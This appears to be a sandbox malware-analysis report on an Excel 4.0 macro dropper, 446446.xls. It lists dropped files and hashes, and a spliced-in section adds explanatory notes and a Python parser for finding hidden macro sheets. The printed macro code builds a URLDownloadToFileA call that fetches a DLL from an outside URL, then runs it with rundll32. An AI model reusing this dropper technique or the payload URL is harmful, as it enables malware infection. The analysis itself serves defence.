                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            IE Cache URL:http://living-traditions.com/blogs/click.php
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\90DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):80628
                            Entropy (8bit):7.888145041366286
                            Encrypted:false
                            SSDEEP:1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD
                            MD5:B0C770DA6FFF46D0500CCF97D7CDA12A
                            SHA1:664AE1F31F2012830589FD05CB8798918F6F0219
                            SHA-256:3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA
                            SHA-512:C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591
                            Malicious:false
                            Reputation:low
                            Preview: .U.n.0....?......(..r.Izl.4...9..s..$..wH+nb(^.......h~1.]=`....53V..N*.l.....WV..V.v.[......?.o..cEh.[..q.E..b.<Z.t..H....X....l...g..T.....+..^..z...o......R-S&..8.D..&.C.+..:..{..$Z..`.N.z..........}E!W^.x.0.~...%....~...|....s.f?Ivib..@...15.Dp...4R..}r.G. #/..#$_nr.N..N....&.. ...MNR...(.G#.&}..m...../r.Gd.G...M..aD^.o..Bs`9cZk.G.9....R.!......w7......1[.....}$.Kg.&8....<}..:ZF..0$..6.1....N.......D9...Of........PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=106496, window=hide
                            Category:dropped
                            Size (bytes):1984
                            Entropy (8bit):4.464349531148646
                            Encrypted:false
                            SSDEEP:24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/
                            MD5:4348595ED5C238F3A7464C51D0660C8B
                            SHA1:E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F
                            SHA-256:727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92
                            SHA-512:67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... ......{..'.N../..H.U../...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..R...R.. .446446.xls..B.......Q.y.Q.y*...8.....................4.4.6.4.4.6...x.l.s.......t...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\446446.xls.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.4.4.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.473944875294604
                            Encrypted:false
                            SSDEEP:12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/
                            MD5:0A126F4CE8A412A7E0B56FDD34D13F90
                            SHA1:205C7790F9A579AD5D87877D7D4A488A388B8AA8
                            SHA-256:9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606
                            SHA-512:B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386
                            Malicious:false
                            Reputation:low
                            Preview: L..................F...........7G..'.N../..'.N../... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.032792717761047
                            Encrypted:false
                            SSDEEP:3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y
                            MD5:E9BA10F8D1524D050B02A3E80256C566
                            SHA1:950B596DB0C42E0A9B02ACEEB0166DACB72B96AE
                            SHA-256:8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B
                            SHA-512:9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..446446.LNK=0..446446.LNK=0..[xls]..446446.LNK=0..
                            C:\Users\user\Desktop\51DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the preview shows Excel BIFF font records, i.e. a workbook stream, not BASIC code)
                            Category:dropped
                            Size (bytes):138843
                            Entropy (8bit):6.821911851482883
                            Encrypted:false
                            SSDEEP:3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ
                            MD5:B68BAB90F3799DF7526E7FDF201A9D29
                            SHA1:50AFB3C63A6BD986AF93D8B15B8F783585FFC295
                            SHA-256:276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78
                            SHA-512:D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31
                            Malicious:false
                            Reputation:low
                            Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                            C:\Users\user\fdinmd.fii
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Apr 12 15:51:16 2021, Security: 0
                            Entropy (8bit):3.2150745788685295
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:446446.xls
                            File size:283136
                            MD5:1b62b4f4b16d6219dce4c6d145c5af79
                            SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
                            SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
                            SHA512:1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e
                            SSDEEP:6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt
                            File Content Preview:........................>.......................'..........................."...#...$...%...&..................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "446446.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-04-12 14:51:16
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.335261663834
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.244430475899
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8 (libmagic misidentification, see note below), Stream Size: 270942
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8 (libmagic misidentification; the stream is a BIFF workbook, see note below)
                            Stream Size:270942
                            Entropy:3.18416886572
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Note: the raw data begins with a BIFF BOF record: 09 08 is the record id 0x0809, 08 00 the record length 8, 00 05 the version 0x0500 and 05 00 the substream type 0x0005 (workbook globals). Version 0x0500 is the Excel 5.0/95 (BIFF5) file format, which is also why the stream is named Book rather than Workbook. XLM droppers are often saved in this older format because some macro extractors and scanners only parse the BIFF8 Workbook stream; the sheet names DocuSign, Docs1, Docs2, Docs3 and the string "Excel 4.0" in the DocumentSummaryInformation stream above show the workbook carries Excel 4.0 macro sheets.
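Added example, not code from the report or from Joe Sandbox: a minimal BIFF record walker that decodes what the raw bytes above encode. It parses the BOF record taken verbatim from the Book stream (09 08 08 00 00 05 05 00 17 37 cd 07), then walks the workbook-globals substream and lists BOUNDSHEET records, flagging Excel 4.0 macro sheets whose state is hidden or very hidden (the "Hidden Macro 4.0" pattern). The BOUNDSHEET records in the sample stream are constructed: the sheet names come from the DocumentSummaryInformation stream above, but their types, visibility flags and offsets are assumptions for illustration and are not read from the sample. Name decoding handles both the BIFF5 byte-string form used here and the BIFF8 form.

```python
"""BIFF record walker: decode BOF and BOUNDSHEET records of a Book/Workbook
stream and flag hidden Excel 4.0 macro sheets. Added example, not report code."""
import struct

BOF, EOF, BOUNDSHEET = 0x0809, 0x000A, 0x0085
BIFF_VERSIONS = {0x0500: "BIFF5/7 (Excel 5.0/95)", 0x0600: "BIFF8 (Excel 97-2003)"}
SHEET_TYPES = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet",
               0x02: "chart", 0x06: "VB module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}


def iter_records(stream):
    """Yield (record id, body) for every complete record; stop at a truncated one."""
    off = 0
    while off + 4 <= len(stream):
        rid, length = struct.unpack_from("<HH", stream, off)
        body = stream[off + 4:off + 4 + length]
        if len(body) < length:
            return
        yield rid, body
        off += 4 + length


def parse_bof(body):
    """BOF body: version, substream type, build id, build year (four uint16)."""
    vers, dt, build, year = struct.unpack_from("<HHHH", body, 0)
    return {"version": vers, "format": BIFF_VERSIONS.get(vers, hex(vers)),
            "substream": dt, "build": build, "year": year}


def parse_boundsheet(body, biff_version, codepage="cp1251"):
    """BOUNDSHEET body: lbPlyPos (uint32), grbit (uint16), cch (uint8), name.
    grbit bits 0-1 = hidden state, bits 8-15 = sheet type."""
    pos, grbit, cch = struct.unpack_from("<IHB", body, 0)
    sheet = {"offset": pos,
             "visibility": VISIBILITY.get(grbit & 0x03, "unknown"),
             "type": SHEET_TYPES.get(grbit >> 8, "unknown")}
    if biff_version >= 0x0600:
        # BIFF8: one flags byte, then 8-bit or UTF-16LE characters.
        raw = body[8:]
        sheet["name"] = (raw[:cch * 2].decode("utf-16-le") if body[7] & 1
                         else raw[:cch].decode(codepage, "replace"))
    else:
        # BIFF5: single-byte characters in the document's code page (1251 here).
        sheet["name"] = body[7:7 + cch].decode(codepage, "replace")
    return sheet


def workbook_sheets(stream, codepage="cp1251"):
    """Return the first BOF plus every BOUNDSHEET of the workbook-globals substream."""
    info = {"bof": None, "sheets": []}
    for rid, body in iter_records(stream):
        if rid == BOF and info["bof"] is None:
            info["bof"] = parse_bof(body)
        elif rid == BOUNDSHEET and info["bof"] is not None:
            info["sheets"].append(parse_boundsheet(body, info["bof"]["version"], codepage))
        elif rid == EOF:
            break  # end of the globals substream; sheet substreams follow
    return info


def hidden_macro_sheets(info):
    """Names of Excel 4.0 macro sheets that are hidden or very hidden."""
    return [s["name"] for s in info["sheets"]
            if s["type"] == "Excel 4.0 macro sheet" and s["visibility"] != "visible"]


def boundsheet_record(name, sheet_type, visibility, offset, codepage="cp1251"):
    """Build a BIFF5 BOUNDSHEET record (only used to construct sample data)."""
    raw = name.encode(codepage)
    body = struct.pack("<IHB", offset, (sheet_type << 8) | visibility, len(raw)) + raw
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


# First 12 bytes of the Book stream exactly as printed in the report.
BOF_FROM_REPORT = bytes.fromhex("0908 0800 0005 0500 1737 cd07")
# Constructed continuation: names from the DocumentSummaryInformation stream;
# sheet types, visibility and offsets are assumed for illustration.
SAMPLE_STREAM = (BOF_FROM_REPORT
                 + boundsheet_record("DocuSign", 0x00, 0, 0x1000)
                 + boundsheet_record("Docs1", 0x01, 2, 0x2000)
                 + boundsheet_record("Docs2", 0x01, 2, 0x3000)
                 + boundsheet_record("Docs3", 0x01, 2, 0x4000)
                 + struct.pack("<HH", EOF, 0))

if __name__ == "__main__":
    info = workbook_sheets(SAMPLE_STREAM)
    print(info["bof"])
    for s in info["sheets"]:
        print(s)
    print("hidden macro sheets:", hidden_macro_sheets(info))
```

To run it against a real sample, extract the Book or Workbook stream with an OLE library (olefile, for instance) and pass its bytes to workbook_sheets; the BOF version decides how sheet names are decoded, so there is no need to know the BIFF flavour in advance.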

                            Macro 4.0 Code

                            "=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(2151
51615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                            ,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32 
